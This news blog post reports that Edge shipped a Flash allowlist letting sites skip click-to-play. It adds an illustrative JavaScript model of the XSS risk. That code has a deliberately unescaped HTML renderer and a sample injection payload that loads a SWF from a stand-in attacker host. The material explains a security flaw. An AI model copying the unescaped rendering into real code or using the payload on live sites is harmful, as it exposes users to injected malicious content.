// NEWS // Edge Lets Facebook Execute Flash Code Without Your Permission!

in #news, 7 years ago

The default browser in Windows 10 contains a whitelist that is hard to justify and that exposes users to uncontrollable attacks.


The Windows 10 browser ships a Flash whitelist: sites on it can execute Flash code without the user's permission.
Until February 2019, this list contained 58 entries for as many sites, including subdomains of Microsoft, Deezer, Yahoo and QQ (a Chinese social network). The most surprising entry, and the one that raises questions about how the list was put together, is the website of a Spanish hairdresser.

The default Flash whitelist in the Edge really surprised me. So many sites for which I'm completely baffled as to why they're there. Like a site of a hairdresser in Spain?! I wonder how the list was formed. And if MSRC knew about it. - Ivan Fratric (@ifsecure) February 19, 2019

What does that entail

These sites could bypass the click-to-play policy, under which Flash content on a page runs only if the user explicitly allows it.

Ivan Fratric, the Google Project Zero researcher who discovered this whitelist and reported the bug last November, believes it poses a serious security problem: some of the pre-authorized sites are known to suffer from XSS vulnerabilities, so an attacker who can inject content into one of them could get malicious Flash code to run without any prompt and compromise the PC running Edge.

Microsoft has since narrowed the whitelist to just two Facebook domains: the main site and its subdomain apps.facebook.com. The researcher questions the need to keep even this free pass for Facebook. (I think it is there to allow the many Flash games on the social platform to run, but how can one be sure?)
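To make the risk concrete, here is an added example (not Edge's code, and not from Project Zero) that models a click-to-play policy with a site allowlist and walks the chain the text describes: an XSS on an allowlisted page injects an embed, and the policy runs the SWF without a prompt. Assumptions: the allowlist holds the two hosts the article says remained (facebook.com and apps.facebook.com), matching is by exact hostname, and the vulnerable page, attacker host and payload are constructed for the example.

```javascript
// Added example, not Edge's code: a model of a Flash click-to-play policy with a
// site allowlist, showing why an XSS on an allowlisted origin defeats the policy.
// Assumptions: the allowlist holds the two hosts the article says remained
// (facebook.com and apps.facebook.com), and matching is by exact hostname.

const FLASH_ALLOWLIST = new Set(["facebook.com", "apps.facebook.com"]);

// Hostname of a URL, or null for anything that does not parse.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// The policy as the article describes it: a user gesture always runs the SWF;
// otherwise an allowlisted embedding page runs it silently and everyone else
// gets a prompt. Note that the SWF's own origin is never consulted.
function flashDecision(pageUrl, swfUrl, userClicked, allowlist = FLASH_ALLOWLIST) {
  if (userClicked) return "run";
  const pageHost = hostOf(pageUrl);
  if (pageHost !== null && allowlist.has(pageHost)) return "run";
  return "prompt";
}

// Hardened variant (an assumption about what a safer policy could look like):
// the allowlist only skips the prompt when the SWF is served from the same
// allowlisted host, so an injected cross-origin SWF still prompts. This does
// not help if the allowlisted site itself hosts attacker-uploaded SWFs.
function flashDecisionHardened(pageUrl, swfUrl, userClicked, allowlist = FLASH_ALLOWLIST) {
  if (userClicked) return "run";
  const pageHost = hostOf(pageUrl);
  const swfHost = hostOf(swfUrl);
  if (pageHost !== null && allowlist.has(pageHost) && swfHost === pageHost) return "run";
  return "prompt";
}

// Pull SWF URLs out of an HTML fragment: <object data="..."> and <embed src="...">.
// A regex is enough for the constructed markup below; it is not a general HTML parser.
function flashEmbedsIn(html) {
  const re = /<(?:object|embed)\b[^>]*?\b(?:data|src)\s*=\s*["']([^"']+\.swf)["'][^>]*>/gi;
  const urls = [];
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

// A reflected-XSS-style page: the search term is concatenated into the markup
// unescaped (the bug). Constructed for the example; not a real Facebook page.
function renderSearchPage(term) {
  return `<html><body><h1>Results for ${term}</h1></body></html>`;
}

// Walk the chain: attacker-controlled term -> injected embed -> policy decision
// (no user click involved, which is exactly the case click-to-play should cover).
function evaluatePage(pageUrl, term, policy = flashDecision) {
  const html = renderSearchPage(term);
  return flashEmbedsIn(html).map((swfUrl) => ({
    swfUrl,
    decision: policy(pageUrl, swfUrl, false),
  }));
}

// Constructed payload: what an XSS on the allowlisted site would inject.
const XSS_PAYLOAD =
  '<object type="application/x-shockwave-flash" data="https://attacker.example/evil.swf"></object>';

// Usage: the same payload on an allowlisted page runs silently, on any other
// page it prompts, and under the hardened policy it prompts on both.
console.log(evaluatePage("https://apps.facebook.com/search", XSS_PAYLOAD));
console.log(evaluatePage("https://example.org/search", XSS_PAYLOAD));
console.log(evaluatePage("https://apps.facebook.com/search", XSS_PAYLOAD, flashDecisionHardened));
```

The design point is that the allowlist is keyed on the embedding page's host, so the guarantee it offers is only as strong as that host's resistance to content injection; even the hardened same-host check only narrows the window, it does not restore the user's consent that click-to-play was meant to provide.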

The context

Flash is due to be retired at the end of 2020 and is widely criticized on security grounds: it has been a steady source of vulnerabilities and is best avoided in day-to-day use. Browsers such as Brave block it by default.

